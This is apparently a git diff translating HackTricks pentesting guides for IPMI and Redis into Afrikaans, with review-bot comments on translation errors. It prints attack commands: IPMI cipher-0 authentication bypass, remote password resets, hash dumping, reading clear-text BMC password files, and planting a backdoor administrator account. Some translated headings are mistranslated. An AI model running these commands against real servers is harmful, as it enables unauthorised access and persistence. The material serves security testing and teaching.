-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutvinders van beloningsjagte! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hacknuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutvindings wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
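Review bot: in the `@@ -143,42 +171,35 @@` hunk, `## Kry Skulp` and `**Omgekeerde Skulp:**` render "shell" as `skulp`, which is a seashell; in a pentesting context the loanword `shell` (or `dop`) is what Afrikaans readers will recognise, so use `## Kry 'n shell` / `**Reverse shell:**`. The blank line before the `msf> use exploit/unix/x11/x11_keyboard_exec` fence is replaced by the fragment `Om 'n skulp te kry`, which has no verb and no punctuation; either restore the blank line or make it a full sentence. Pre-existing but visible here: `./xrdp.py \ –no-disp` uses an en dash instead of `--no-disp`, which will not be parsed as an option, and the references list contains the infosecinstitute URL twice.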
diff --git a/network-services-pentesting/623-udp-ipmi.md b/network-services-pentesting/623-udp-ipmi.md index e7ef373fc..1efc7bed1 100644 --- a/network-services-pentesting/623-udp-ipmi.md +++ b/network-services-pentesting/623-udp-ipmi.md @@ -4,128 +4,109 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -### **Overview of IPMI** +### **Oorsig van IPMI** -**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for: +**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** bied 'n gestandaardiseerde benadering vir afstandsbestuur en monitering van rekenaarstelsels, onafhanklik van die bedryfstelsel of kragtoestand. Hierdie tegnologie maak dit moontlik vir stelseladministrateurs om stelsels op afstand te bestuur, selfs wanneer hulle afgeskakel of onreageerbaar is, en is veral nuttig vir: -- Pre-OS boot configurations -- Power-off management -- Recovery from system failures +- Voor-OS-opstartkonfigurasies +- Kragafskakelingbestuur +- Herstel van stelselstoringe -IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. Essential for its operation are a power source and a LAN connection. +IPMI is in staat om temperature, spanning, spoed van waaiers en kragvoorsiening te monitor, en bied ook inventarisinligting, hersiening van hardeware-logboeke en stuur waarskuwings via SNMP. 'n Kragbron en 'n LAN-verbinding is noodsaaklik vir sy werking. -Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. 
Key components include: +Sedert dit in 1998 deur Intel bekendgestel is, word IPMI ondersteun deur talle verskaffers wat afstandsbestuursmoontlikhede verbeter het, veral met ondersteuning vir seriële oor LAN in weergawe 2.0. Sleutelkomponente sluit in: -- **Baseboard Management Controller (BMC):** The main micro-controller for IPMI operations. -- **Communication Buses and Interfaces:** For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections. -- **IPMI Memory:** For storing logs and data. +- **Baseboard Management Controller (BMC):** Die hoofmikrokontroleerder vir IPMI-operasies. +- **Kommunikasiebusse en -interfaces:** Vir interne en eksterne kommunikasie, insluitend ICMB, IPMB en verskeie interfaces vir plaaslike en netwerkverbindings. +- **IPMI-geheue:** Vir berging van logboeke en data. ![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right) -**Default Port**: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP) +**Verstekpoort**: 623/UDP/TCP (Dit is gewoonlik op UDP, maar dit kan ook op TCP loop) -## Enumeration - -### Discovery +## Enumerasie +### Ontdekking ```bash nmap -n -p 623 10.0.0./24 nmap -n-sU -p 623 10.0.0./24 use auxiliary/scanner/ipmi/ipmi_version ``` - -You can **identify** the **version** using: - +Jy kan die weergawe identifiseer deur die volgende te gebruik: ```bash use auxiliary/scanner/ipmi/ipmi_version nmap -sU --script ipmi-version -p 623 10.10.10.10 ``` +### IPMI Kwesbaarhede -### IPMI Vulnerabilities +In die domein van IPMI 2.0 is 'n beduidende sekuriteitsfout ontdek deur Dan Farmer, wat 'n kwesbaarheid deur middel van **sifer tipe 0** blootgestel het. 
Hierdie kwesbaarheid, in detail gedokumenteer by [Dan Farmer se navorsing](http://fish2.com/ipmi/cipherzero.html), maak ongemagtigde toegang moontlik met enige wagwoord, mits 'n geldige gebruiker geteiken word. Hierdie swakheid is gevind in verskeie BMC's van vervaardigers soos HP, Dell en Supermicro, wat dui op 'n wye verspreide probleem binne alle IPMI 2.0-implementasies. -In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through **cipher type 0**. This vulnerability, documented in detail at [Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html), enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations. - -### **IPMI Authentication Bypass via Cipher 0** - -To detect this flaw, the following Metasploit auxiliary scanner can be employed: +### **IPMI-outentifikasie-omleiding via Sifer 0** +Om hierdie fout op te spoor, kan die volgende Metasploit hulpprogram vir skandering gebruik word: ```bash use auxiliary/scanner/ipmi/ipmi_cipher_zero ``` - -Exploitation of this flaw is achievable with `ipmitool`, as demonstrated below, allowing for the listing and modification of user passwords: - +Uitbuiting van hierdie fout is haalbaar met `ipmitool`, soos hieronder gedemonstreer, wat die lys en wysiging van gebruikerswagwoorde moontlik maak: ```bash apt-get install ipmitool # Installation command ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password ``` +### **IPMI 2.0 RAKP-verifikasie Verwydering van Verwyderde Wagwoord Hash** -### **IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval** - -This vulnerability enables retrieval of salted hashed passwords (MD5 and SHA1) for any existing username. 
To test this vulnerability, Metasploit offers a module: - +Hierdie kwesbaarheid maak dit moontlik om gesoute gehashde wagwoorde (MD5 en SHA1) vir enige bestaande gebruikersnaam te herwin. Om hierdie kwesbaarheid te toets, bied Metasploit 'n module aan: ```bash msf > use auxiliary/scanner/ipmi/ipmi_dumphashes ``` +### **IPMI Anonieme Verifikasie** -### **IPMI Anonymous Authentication** - -A default configuration in many BMCs allows "anonymous" access, characterized by null username and password strings. This configuration can be exploited to reset passwords of named user accounts using `ipmitool`: - +'n Standaard konfigurasie in baie BMC's maak "anonieme" toegang moontlik, gekenmerk deur 'n leë gebruikersnaam en wagwoord. Hierdie konfigurasie kan uitgebuit word om wagwoorde van genoemde gebruikersrekeninge te herstel deur gebruik te maak van `ipmitool`: ```bash ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword ``` +### **Supermicro IPMI Duidelike-tekswagwoorde** -### **Supermicro IPMI Clear-text Passwords** - -A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes. Supermicro's storage of these passwords in locations such as `/nv/PSBlock` or `/nv/PSStore` raises significant security concerns: - +'n Kritieke ontwerpkeuse in IPMI 2.0 vereis die berging van duidelike-tekswagwoorde binne BMC's vir outentiseringsdoeleindes. Supermicro se berging van hierdie wagwoorde in plekke soos `/nv/PSBlock` of `/nv/PSStore` veroorsaak aansienlike veiligheidskwessies: ```bash cat /nv/PSBlock ``` +### **Supermicro IPMI UPnP Kwesbaarheid** -### **Supermicro IPMI UPnP Vulnerability** - -Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. 
Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by [Rapid7's disclosure](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), allow for root access to the BMC: - +Supermicro se insluiting van 'n UPnP SSDP luisteraar in sy IPMI-firmware, veral op UDP-poort 1900, stel 'n ernstige veiligheidsrisiko in. Kwesbaarhede in die Intel SDK vir UPnP-toestelle weergawe 1.3.1, soos beskryf deur [Rapid7 se openbaarmaking](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), maak dit moontlik om root-toegang tot die BMC te verkry: ```bash msf> use exploit/multi/upnp/libupnp_ssdp_overflow ``` - - ### Brute Force -**HP randomizes the default password** for its **Integrated Lights Out (iLO)** product during manufacture. This practice contrasts with other manufacturers, who tend to use **static default credentials**. A summary of default usernames and passwords for various products is provided as follows: +**HP randomiseer die verstek wagwoord** vir sy **Integrated Lights Out (iLO)** produk tydens vervaardiging. Hierdie praktyk verskil van ander vervaardigers wat geneig is om **statiese verstek geloofsbriewe** te gebruik. 'n Opsomming van verstek gebruikersname en wagwoorde vir verskeie produkte word as volg verskaf: -- **HP Integrated Lights Out (iLO)** uses a **factory randomized 8-character string** as its default password, showcasing a higher security level. -- Products like **Dell's iDRAC, IBM's IMM**, and **Fujitsu's Integrated Remote Management Controller** use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively. -- Similarly, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, and **ASUS iKVM BMC** also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords. 
+- **HP Integrated Lights Out (iLO)** gebruik 'n **fabrieksgematigde 8-karakter string** as sy verstek wagwoord, wat 'n hoër veiligheidsvlak toon. +- Produkte soos **Dell se iDRAC, IBM se IMM**, en **Fujitsu se Integrated Remote Management Controller** gebruik maklik raadbare wagwoorde soos "calvin", "PASSW0RD" (met 'n nul), en "admin" onderskeidelik. +- Op soortgelyke wyse gebruik **Supermicro IPMI (2.0), Oracle/Sun ILOM**, en **ASUS iKVM BMC** ook eenvoudige verstek geloofsbriewe, met "ADMIN", "changeme", en "admin" as hul wagwoorde. +## Toegang tot die Gasheer via BMC -## Accessing the Host via BMC +Administratiewe toegang tot die Baseboard Management Controller (BMC) maak verskeie roetes oop vir toegang tot die gasheer se bedryfstelsel. 'n Reguit benadering behels die uitbuiting van die BMC se Keyboard, Video, Mouse (KVM) funksionaliteit. Dit kan gedoen word deur óf die gasheer te herlaai na 'n root-skulp via GRUB (deur `init=/bin/sh` te gebruik) óf deur te herlaai vanaf 'n virtuele CD-ROM wat as 'n reddingskyf ingestel is. Sulke metodes maak direkte manipulasie van die gasheer se skyf moontlik, insluitend die invoeging van agterdeure, data-onttrekking, of enige nodige aksies vir 'n sekuriteitsassessering. Dit vereis egter dat die gasheer herlaai word, wat 'n groot nadeel is. Sonder om te herlaai, is toegang tot die lopende gasheer meer kompleks en wissel afhangende van die gasheer se konfigurasie. As die gasheer se fisiese of seriële konsole aangemeld bly, kan dit maklik oorgeneem word deur die BMC se KVM- of seriële-oor-LAN (sol) funksionaliteite via `ipmitool`. Die uitbuiting van gedeelde hardwareressources, soos die i2c-bus en Super I/O-skyf, is 'n gebied wat verdere ondersoek verg. -Administrative access to the Baseboard Management Controller (BMC) opens various pathways for accessing the host's operating system. A straightforward approach involves exploiting the BMC's Keyboard, Video, Mouse (KVM) functionality. 
This can be done by either rebooting the host to a root shell via GRUB (using `init=/bin/sh`) or booting from a virtual CD-ROM set as a rescue disk. Such methods allow for direct manipulation of the host's disk, including the insertion of backdoors, data extraction, or any necessary actions for a security assessment. However, this requires rebooting the host, which is a significant drawback. Without rebooting, accessing the running host is more complex and varies with the host's configuration. If the host's physical or serial console remains logged in, it can easily be taken over through the BMC's KVM or serial-over-LAN (sol) functionalities via `ipmitool`. Exploring the exploitation of shared hardware resources, like the i2c bus and Super I/O chip, is an area that demands further investigation. - -## Introducing Backdoors into BMC from the Host - -Upon compromising a host equipped with a BMC, the **local BMC interface can be leveraged to insert a backdoor user account**, creating a lasting presence on the server. This attack necessitates the presence of **`ipmitool`** on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS. +## Invoering van Agterdeure in BMC vanaf die Gasheer +Nadat 'n gasheer wat toegerus is met 'n BMC gekompromitteer is, kan die **plaaslike BMC-koppelvlak gebruik word om 'n agterdeur-gebruikersrekening in te voeg**, wat 'n blywende teenwoordigheid op die bediener skep. Hierdie aanval vereis die teenwoordigheid van **`ipmitool`** op die gekompromitteerde gasheer en die aktivering van BMC-bestuursprogramondersteuning. 
Die volgende opdragte illustreer hoe 'n nuwe gebruikersrekening in die BMC ingevoeg kan word deur gebruik te maak van die plaaslike koppelvlak van die gasheer, wat die behoefte aan verifikasie omseil. Hierdie tegniek is toepaslik op 'n wye verskeidenheid bedryfstelsels, insluitend Linux, Windows, BSD, en selfs DOS. ```bash ipmitool user list ID Name Callin Link Auth IPMI Msg Channel Priv Limit @@ -141,26 +122,24 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit 3 root true false false Unknown (0x00) 4 backdoor true false true ADMINISTRATOR ``` - - ## Shodan * `port:623` -## References +## Verwysings * [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
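Review bot: two of the translated lines in the first hunk change the meaning of the source. The heading "### **IPMI 2.0 RAKP-verifikasie Verwydering van Verwyderde Wagwoord Hash**" reads as "removal of removed password hash" where the English says "Remote Password Hash Retrieval"; suggest "### **IPMI 2.0 RAKP-verifikasie: Wagwoordhash-herwinning op Afstand**". In the Brute Force bullets, "fabrieksgematigde 8-karakter string" means "factory-moderated", not "factory randomized"; suggest "'n 8-karakter string wat in die fabriek lukraak gegenereer word". The same hunk also drops the blank lines around every fenced block (e.g. "+Jy kan die weergawe identifiseer deur die volgende te gebruik:" is followed directly by the ```bash fence) and puts "+## Enumerasie" directly on "+### Ontdekking"; keep the surrounding blank lines from the `-` lines so the headings, paragraphs and fences render the same way as the English page.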
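Review bot: the footer banner in the second hunk (@@ -141,26 +122,24 @@) is not consistent with the header banner of the same file: the top says "Deel jou hacktruuks" while the bottom says "Deel jou hacking-truuks", and the Redis file later renders the same sentence as "hack-truuks" and "github-opslag" versus "github-repos" here. Since this banner is shared by every page in the repository, settle on one rendering (one of "hack-truuks"/"github-repos") and apply it everywhere so later diffs on the banner stay trivial.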
diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index f7f8a763a..fea741be3 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -2,100 +2,89 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutvinders van beloningsjagte! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutvindings wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -From [the docs](https://redis.io/topics/introduction): Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker). +Vanaf [die dokumentasie](https://redis.io/topics/introduction): Redis is 'n oopbron (BSD-gelisensieerde), in-memory **datastruktuurwinkel**, wat gebruik word as 'n **databasis**, cache en boodskapmakelaar). -By default Redis uses a plain-text based protocol, but you have to keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md). - -**Default port:** 6379 +Standaard gebruik Redis 'n teksgebaseerde protokol, maar onthou dat dit ook **ssl/tls** kan implementeer. 
Leer hoe om [Redis met ssl/tls hier uit te voer](https://fossies.org/linux/redis/TLS.md). +**Standaardpoort:** 6379 ``` PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 4.0.9 ``` +## Outomatiese Opsomming -## Automatic Enumeration - -Some automated tools that can help to obtain info from a redis instance: - +Sommige outomatiese gereedskap wat kan help om inligting van 'n Redis-instantie te verkry: ```bash nmap --script redis-info -sV -p 6379 msf> use auxiliary/scanner/redis/redis_server ``` +## Handmatige Enumerasie -## Manual Enumeration +### Banier -### Banner - -Redis is a **text based protocol**, you can just **send the command in a socket** and the returned values will be readable. Also remember that Redis can run using **ssl/tls** (but this is very weird). - -In a regular Redis instance you can just connect using `nc` or you could also use `redis-cli`: +Redis is 'n **teksgebaseerde protokol**, jy kan net die bevel in 'n sokket stuur en die teruggekeerde waardes sal leesbaar wees. Onthou ook dat Redis kan loop met behulp van **ssl/tls** (maar dit is baie vreemd). +In 'n gewone Redis-instantie kan jy net verbind met behulp van `nc` of jy kan ook `redis-cli` gebruik: ```bash nc -vn 10.10.10.10 6379 redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools ``` - -The **first command** you could try is **`info`**. It **may return output with information** of the Redis instance **or something** like the following is returned: - +Die **eerste bevel** wat jy kan probeer is **`info`**. Dit **kan uitset met inligting** van die Redis-instantie **teruggee of iets** soos die volgende kan teruggegee word: ``` -NOAUTH Authentication required. ``` +In hierdie laaste geval beteken dit dat **jy geldige geloofsbriewe nodig het** om toegang tot die Redis-instantie te verkry. -In this last case, this means that **you need valid credentials** to access the Redis instance. 
+### Redis-verifikasie -### Redis Authentication - -**By default** Redis can be accessed **without credentials**. However, it can be **configured** to support **only password, or username + password**.\ -It is possible to **set a password** in _**redis.conf**_ file with the parameter `requirepass` **or temporary** until the service restarts connecting to it and running: `config set requirepass p@ss$12E45`.\ -Also, a **username** can be configured in the parameter `masteruser` inside the _**redis.conf**_ file. +**Standaard** kan Redis **sonder geloofsbriewe** benader word. Dit kan egter **gekonfigureer** word om slegs **wagwoord, of gebruikersnaam + wagwoord** te ondersteun.\ +Dit is moontlik om 'n wagwoord in die _**redis.conf**_ lêer in te stel met die parameter `requirepass` **of tydelik** totdat die diens herlaai word deur daarmee te verbind en die volgende uit te voer: `config set requirepass p@ss$12E45`.\ +'n **Gebruikersnaam** kan ook gekonfigureer word in die parameter `masteruser` binne die _**redis.conf**_ lêer. {% hint style="info" %} -If only password is configured the username used is "**default**".\ -Also, note that there is **no way to find externally** if Redis was configured with only password or username+password. +As slegs 'n wagwoord gekonfigureer is, word die gebruikte gebruikersnaam "**default**".\ +Merk ook op dat daar **geen manier is om ekstern te vind** of Redis gekonfigureer is met slegs 'n wagwoord of gebruikersnaam+wagwoord nie. 
{% endhint %} -In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../generic-methodologies-and-resources/brute-force.md#redis) it.\ -**In case you found valid credentials you need to authenticate the session** after establishing the connection with the command: - +In gevalle soos hierdie sal jy **geldige geloofsbriewe moet vind** om met Redis te kan kommunikeer, dus kan jy probeer om dit [**brute-force**](../generic-methodologies-and-resources/brute-force.md#redis) te doen.\ +**In die geval dat jy geldige geloofsbriewe gevind het, moet jy die sessie verifieer** nadat die verbinding tot stand gebring is met die volgende bevel: ```bash AUTH ``` +**Geldige geloofsbriewe** sal beantwoord word met: `+OK` -**Valid credentials** will be responded with: `+OK` - -### **Authenticated enumeration** - -If the Redis server permits **anonymous connections** or if you have obtained valid credentials, you can initiate the enumeration process for the service using the following **commands**: +### **Geauthentiseerde opname** +As die Redis-bediener **anonieme verbindinge** toelaat of as jy geldige geloofsbriewe verkry het, kan jy die opnameproses vir die diens inisieer deur die volgende **opdragte** te gebruik: ```bash INFO [ ... Redis response with info ... ] 
@@ -104,48 +93,40 @@ client list CONFIG GET * [ ... Get config ... ] ``` +**Ander Redis-opdragte** [**kan hier gevind word**](https://redis.io/topics/data-types-intro) **en** [**hier**](https://lzone.de/cheat-sheet/Redis)**.** -**Other Redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.** - -Note that the **Redis commands of an instance can be renamed** or removed in the _redis.conf_ file. For example this line will remove the command FLUSHDB: - +Merk op dat die **Redis-opdragte van 'n instansie hernoem** of verwyder kan word in die _redis.conf_ lêer. Byvoorbeeld, hierdie lyn sal die opdrag FLUSHDB verwyder: ``` rename-command FLUSHDB "" ``` +Meer oor die veilige konfigurasie van 'n Redis-diens hier: [https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04) -More about configuring securely a Redis service here: [https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04) +Jy kan ook **in werklike tyd die Redis-opdragte monitor** met die opdrag **`monitor`** of die top **25 stadigste navrae** kry met **`slowlog get 25`** -You can also **monitor in real time the Redis commands** executed with the command **`monitor`** or get the top **25 slowest queries** with **`slowlog get 25`** +Vind meer interessante inligting oor meer Redis-opdragte hier: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis) -Find more interesting information about more Redis commands here: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis) +### **Databasis aflaai** -### **Dumping Database** - -Inside Redis the **databases are numbers starting from 0**. 
